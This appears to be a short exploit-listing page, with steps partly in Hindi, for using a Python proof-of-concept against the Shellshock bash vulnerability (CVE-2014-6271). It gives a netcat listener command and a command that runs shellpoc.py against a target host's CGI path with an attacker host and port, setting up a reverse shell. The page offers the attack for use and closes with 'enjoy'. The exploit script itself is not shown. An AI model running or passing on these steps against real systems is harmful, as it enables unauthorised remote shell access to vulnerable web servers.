Exploit for CVE-2014-6271
Exploit Code
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZALALOV-CVE-2014-6271
# CVE-2014-6271
### python2.7
* अपनी मशीन पर लिसनिंग शुरू करें।
root@kitploit:~
nc -l -p 4444
* नीचे दिए गए नियम के अनुसार पायथन स्क्रिप्ट चलाएँ:
> python shellpoc.py <host> <vulnerable CGI> <attackhost/IP>
root@kitploit:~
python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444
* आनंद लें।